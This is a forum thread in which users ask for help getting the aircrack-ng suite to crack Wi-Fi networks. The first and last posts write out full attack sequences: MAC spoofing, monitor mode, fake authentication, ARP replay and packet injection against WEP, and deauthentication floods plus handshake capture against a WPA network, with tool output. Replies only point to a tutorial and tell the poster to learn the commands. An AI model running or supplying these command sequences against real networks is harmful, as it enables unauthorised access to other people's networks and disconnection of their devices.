Results 1 to 5 of 5

Thread: backtrack 3 airodump

  1. #1
    naughtyruma
    Guest

    Default backtrack 3 airodump

    can someone pls help me in executing thecommands
    wat is wrong here....??

    bt ~ # modprobe -r iwl3945
    bt ~ # modprobe ipwraw
    bt ~ # iwconfig
    bt ~ # airmon-ng stop ath0
    bt ~ # ifconfig wifi0 down
    bt ~ # macchanger --mac 00:11:22:33:44:55 wifi0
    bt ~ # airmon-ng start wifi0
    bt ~ # airodump-ng ath0
    bt ~ # airodump-ng -c 6 -w dump --bssid 00:15:B4:06:E4:06 ath0
    bt ~ # aireplay-ng -1 0 -a 00:15:B4:06:E4:06 -h 00:11:22:33:44:55 -e hacker wifi0
    bt ~ # aireplay-ng -3 -b 00:15:B4:06:E4:06 -h 00:11:22:33:44:55 wifi0
    bt ~ # aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:15:B4:06:E4:06 -h 00:11:22:33:44:55 wifi0
    bt ~ # aircrack-ng -n 64 -b 00:15:B4:06:E4:06 dump -01.cap




  2. #2
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default

    First i see that you are rewriting command from someone tutorial.

    Why you are write first two commands (modprobe -r iwl3945

    modprobe ipwraw) you also have intel chipset or you see somewhere in tutorial this command.

    I think you read this tutorial on theword site and rewriting.

    Can you pleas honestly answer on my question?

  3. #3
    Member
    Join Date
    Jan 2010
    Posts
    332

    Default

    Hi Handsome-geek, nice to see you around!

    I agree, I think the OP is just copy/pasting commands he found somewhere.

    @ naughtyruma

    You should learn the purpose of the commands you're using. Then you will know what you're doing wrong (not to say understand the output you get after running them). That takes commitment but the fruits of labor are sweet. (All info is available in the forum, you just need some googlefu and the will to read).
    SecurityTube has two new sections. Questions & News

  4. #4
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default

    Tutorial: Cracking WEP Using Backtrack 3 | Whats the w0rd? look at this and at his commands


    Hi also nice to see you around.

    It wil be good to have some meeting for all backtrack lovers in Croatia.

    See you.

  5. #5
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    3

    Default

    whats wrong in the following crack attempt my friens pls do help
    airmon-ng
    airmon-ng stop ath0
    (VAP destroyed)
    ifconfig wifi0 down
    macchanger --mac 00:11:22:33:44:55 wifi0
    Current MAC: 00:1r:9y:b0:bk:15 (unknown)
    Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
    airmon-ng start wifi0
    (monitor mode enabled)
    airodump-ng ath0
    00:1B:57:FD:79D 13 24 0 0 11 54 WPA TKIP PSK UTStarcom
    aireplay-ng -1 0 -a 00:1B:57:FD:79D -h 00:11:22:33:44:55 -e hacker ath0
    20:26:00 Waiting for beacon frame (BSSID: 00:1B:57:FD:79D) on channel 11
    20:26:01 Sending Authentication Request (Open System)
    20:26:01 Authentication successful
    aireplay-ng -0 5 -a 00:1B:57:FD:79D -h 00:11:22:33:44:55 -e UTStarcom ath0
    20:27:25 Waiting for beacon frame (BSSID: 00:1B:57:FD:79D) on channel 11
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:27:29 Sending DeAuth to broadcast -- BSSID: [00:1B:57:FD:79D]
    20:27:30 Sending DeAuth to broadcast -- BSSID: [00:1B:57:FD:79D]
    CH 11 ][ BAT: 1 hour 21 mins ][ Elapsed: 16 mins ][ 2009-07-16 20:18
    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    00:1B:57:FD:79D 3 21 7791 51 0 11 54 WPA TKIP PSK UTStarcom
    BSSID STATION PWR Rate Lost Packets Probes
    00:1B:57:FD:79D 00:1A:73:3C:02:AD 20 1-54 0 19
    aircrack-ng wpa-01.cap
    Opening wpa-01.cap
    Read 3020 packets.
    # BSSID ESSID Encryption

    1 00:1B:57:FD:79D UTStarcom WPA (0 handshake)

    Choosing first network as target.

    Opening wpa-01.cap
    Please specify a dictionary (option -w).

    Quitting aircrack-ng...
    aircrack-ng wpa-01.cap -w

    [/COLOR]

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •